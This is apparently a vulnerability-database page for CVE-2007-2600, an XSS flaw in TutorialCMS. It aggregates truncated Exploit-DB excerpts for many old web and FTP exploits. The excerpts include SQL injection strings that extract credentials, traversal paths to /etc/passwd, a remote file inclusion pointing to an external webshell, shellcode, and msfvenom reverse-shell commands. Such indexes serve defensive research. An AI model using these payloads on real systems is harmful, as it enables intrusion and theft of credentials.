CVE-2007-2600
Published: 2007-05-11
Priority: P426 · medium · CVSS 2.0: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.78% (84.6th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in TutorialCMS (aka Photoshop Tutorials) 1.00 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) catFile parameter to (a) browseCat.php or (b) browseSubCat.php; the (2) id parameter to (c) openTutorial.php, (d) topFrame.php, or (e) admin/editListing.php; or the (3) search parameter to search.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavelink_media | tutorialcms | <= 1.00 | — |
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
Exploit-DB
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
exploitdb·2012-06-14
CVE-2007-1195 XM Easy Personal FTP Server 5.30 - Remote Format String Write4
---
#!/usr/bin/python
# XM Easy Personal FTP Server v 2
# (+) Choose your option:
# 1. use no authentication (anonymous is disabled)
# 2. use authentication (anonymous is enabled)
# --> 1
# (+) Connecting to the target 192.168.153.160:21
# (+) Seeding payload...
# (+) Triggering write4....
# (+) Connecting to the targets shell!
# Connection to 192.168.153.160 4444 port [tcp/*] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\steve>
#
# example exploitation against Windows Server 23k:
#
# mr_me@gliese:~/pentest/research/targets/xm$ ./poc_working.py 192.168.153.159
# -------------------------------------------------------------------------
# XM Easy Per
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow
exploitdb·2009-09-03
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
neuron news 1.0 - 'index.php?q' Local File Inclusion
exploitdb·2007-09-21
CVE-2007-5050 neuron news 1.0 - 'index.php?q' Local File Inclusion
---
\\\|///
\\ - - // Y! Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Neuron News 1.0
Download : http://downloads.localhost.be/scripts/neuronnews.zip
Author : Dj7xpl
HomePage : http://r00t.ir / http://Dj7xpl.2600.ir
Type : Local File Inclusion
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln :
http://[TARGET]/[PATH]/index.php?q=[Local File]%00
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-09-21]
Exploit-DB
Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)
exploitdb·2007-08-29
CVE-2007-3034 Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)
---
/*
* MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
* by Hong Gil-Dong & Chun Woo-Chi
* Yang yeon(?~1542), Korea
* "I shall keep clenching my left fist unitl i see the real tao".
* This POC is only for test. If an application read a malformed wmf
* file like this POC, the application will be crashed. If you apply
* this code, you can execute an arbitrary code.
*
* We tested this code on Windows XP SP2 Korean Edition
* (GDI32.dll version 5.1.2600.3099). But it will work well on other
* systems.
*/
#include
#include
#define WMF_FILE "ms07-046.wmf"
void usage(void);
int main()
{
FILE *fp;
char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00"\
"\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02
Exploit-DB
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb·2007-08-09
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
---
http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
Exploit-DB
Rational Software Hidden Administrator 1.7 - Authentication Bypass
exploitdb·2007-05-19
CVE-2007-2783 Rational Software Hidden Administrator 1.7 - Authentication Bypass
---
####################################################################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# https://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h -p -t #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################
Exploit-DB
PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion
exploitdb·2007-05-12
CVE-2007-2665 PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion
---
..:: PhpFirstPost blog Remote File Include Exploit ::..
/*
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
[!] Portal : PhpFirstPost 0.1
[!] Download : http://sourceforge.net/projects/phpfirstpost/
[!] Type : Remote File Include Exploit
*/
var path="/"
var adress="block.php?"
var include ="Include="
var phpshell="http://dj7xpl.by.ru/shell/c99.php?"
function command(){
if (document.rfi.target1.value==""){
alert("Exploit Failed...");
return false;
}
rfi.action= document.rfi.target1.value+path+adress+include
Exploit-DB
R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion
exploitdb·2007-05-11
CVE-2007-2642 R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
[!] Portal : R2K Gallery v1.7
[!] Download : http://usuarios.lycos.es/r2kscripts/
[!] Type : Local File Include Vuln
Bug :
http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]
Example :
http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00
# milw0rm.com [2007-05-11]
Exploit-DB
maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
exploitdb·2007-05-11
CVE-2007-2643 maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability
Vuln Code : Line (152 - 157)
[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
fclose($fp);
} else {
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
[/Code]
Bug :
http://[Target]/[Path]/phpT
Exploit-DB
TutorialCMS 1.00 - 'search.php?search' SQL Injection
exploitdb·2007-05-09
CVE-2007-2600 TutorialCMS 1.00 - 'search.php?search' SQL Injection
---
#!/usr/bin/perl -w
#################################################################################
# #
# TutorialCMS alert('http://www.w4ck1ng.com') #
# #
# PoC: http://victim.com/search.php?search=' UNION SELECT 0,0,0,0,username, #
# password,0,0,0,0,0,0,0 FROM users WHERE id='1' /* #
# #
# Subject To: magic_quotes_gpc set to off #
# GoogleDork: "Powered By Photoshop Tutorials" (0 Results) #
# #
# Shoutz: The entire w4ck1ng community #
# #
#################################################################################
use LWP::UserAgent;
if (@ARGV new() or die "Could not initialize browser\n";
$useragent->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$sql = $ARGV[0] . "search.php?search=' UNION SELECT 0,0,0,0
Exploit-DB
Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass
exploitdb·2007-05-05
CVE-2007-2574 Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Archangel Weblog version 0.90.02
Home : http://www.archangelmgt.com/weblog.shtml
Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
Author : Dj7xpl / [email protected]
HomePage : http://Dj7xpl.2600.ir
Type : Local File Inclusion & Login Page Bypass By Cookie
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Local File Include :
http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00
+--------
Exploit-DB
PostNuke Module v4bJournal - SQL Injection
exploitdb·2007-05-02
CVE-2007-2492 PostNuke Module v4bJournal - SQL Injection
---
PostNuke Journal
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: [email protected]
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
Contact: [email protected]
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
EX:-
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_
Exploit-DB
PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure
exploitdb·2007-05-02
CVE-2007-2486 PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure
---
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
|* *|
|* Y! Underground Group *|
|* *|
\*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
Portal.....: PStruh-CZ 1.3&1.5
Type.......: Remote File Disclosure Vulnerability
Author.....: Dj7xpl / [email protected]
HomePage...: http://Dj7xpl.2600.ir
\*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
Bug........:
download.asp?File=[File
Exploit-DB
1024 CMS 0.7 - 'download.php' Remote File Disclosure
exploitdb·2007-05-02
CVE-2007-2507 1024 CMS 0.7 - 'download.php' Remote File Disclosure
---
\#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me
PoC :
http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd
# milw0rm.com [2007-05-02]
Exploit-DB
Maran PHP Forum - 'forum_write.php' Remote Code Execution
exploitdb·2007-04-22
CVE-2007-2182 Maran PHP Forum - 'forum_write.php' Remote Code Execution
---
+ +
+ Y! Underground Group +
+ +
+ +
+ Portal......: Maran PHP Forum +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote Code Execution +
+ Download....: http://www.maran.pamil-visions.com/maranforum.php +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Xpl.........: +
+ ---===Maran PHP Forum===------===Dj7xpl===--- +
+ +
+ +
+ +
+ " type="text" > +
+ +
+ +
+ +
+ Please change Target And Run This Script +
+ Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell +
+ E.g : http://site.com/forum/data/filename.php?cmd=ls -la +
+ +
+ +
+ +
+ +
+ +
# milw0rm.com [2007-04-22]
Exploit-DB
JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure
exploitdb·2007-04-22
CVE-2007-2184 JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure
---
Y! Underground Group
http://2600.ir
Portal.......: jchit counter v1.0.0
Download.....: http://developers.jccorp.net
Type.........: Remote File Disclosure Vulnerability
Author.......: Dj7xpl / [email protected]
HomePage.....: http://Dj7xpl.2600.ir
Bug..........:
imgsrv.php?acc=[Local File]%00
imgsrv.php?acc=../../../../../etc/passwd%00
imgsrv.php?acc=../config.php%00
# milw0rm.com [2007-04-22]
Exploit-DB
PHP-Ring Webring System 0.9 - SQL Injection
exploitdb·2007-04-22
CVE-2007-2183 PHP-Ring Webring System 0.9 - SQL Injection
---
Y! Underground Group
http://2600.ir
Portal.......: uPHP_ring_website
Download.....: http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........: Sql Injection Attack
Author.......: Dj7xpl / [email protected]
HomePage.....: http://Dj7xpl.2600.ir
Bug..........:
index.php?ring=Sql.Inject
index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*
# milw0rm.com [2007-04-22]
Exploit-DB
Mozzers SubSystem final - 'subs.php' Remote Code Execution
exploitdb·2007-04-18
CVE-2007-2169 Mozzers SubSystem final - 'subs.php' Remote Code Execution
---
+ +
+ Y! Underground Group +
+ +
+ +
+ Portal......: Mozzers SubSystem v1.0 Final +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote Code Execution Vulnerability +
+ Download....: http://sourceforge.net/projects/subsystem/ +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Bug.........: +
+ (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add +
+ (2) Insert Bad Code Into (Sub-name) Or (Sub-url) E.g : +
+ (3) See Your Bad Code : http://[Target]/[Path]/subs.php +
+ +
# milw0rm.com [2007-04-18]
Exploit-DB
jGallery 1.3 - 'index.php' Remote File Inclusion
exploitdb·2007-04-18
CVE-2007-2158 jGallery 1.3 - 'index.php' Remote File Inclusion
---
+ +
+ Y! Underground Team +
+ +
+ +
+ Portal......: jGallery 1.3 +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote File Inclusion Vulnerability +
+ Dork........: intitle:"jGallery" +
+ Download....: http://portal.kooijman-design.nl/jGallery/README.html +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Bug.........: http://[Target]/[Path]/index.php?G_JGALL[inc_path]=http://[EvilSite]/Evil.txt%00 +
+ +
# milw0rm.com [2007-04-18]
Exploit-DB
Zomplog 3.8 - 'force_download.php' Remote File Disclosure
exploitdb·2007-04-18
CVE-2007-2157 Zomplog 3.8 - 'force_download.php' Remote File Disclosure
---
+ +
+ Y! Underground Group +
+ +
+ +
+ Portal......: Zomplog v3.8 +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote File Disclosure Vulnerability +
+ Download....: www.zomp.nl/zomplog +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Bug.........: http://[Target]/[Path]/upload/force_download.php?file=[Local Path] +
+ E.g.........: http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd +
+ +
# milw0rm.com [2007-04-18]
No writeups or analysis indexed.
http://osvdb.org/35892
http://osvdb.org/35893
http://osvdb.org/35894
http://osvdb.org/35895
http://osvdb.org/35896
http://osvdb.org/35897
http://www.securityfocus.com/bid/23905
http://www.vupen.com/english/advisories/2007/1742
https://exchange.xforce.ibmcloud.com/vulnerabilities/34215
https://www.exploit-db.com/exploits/3887
Published: 2007-05-11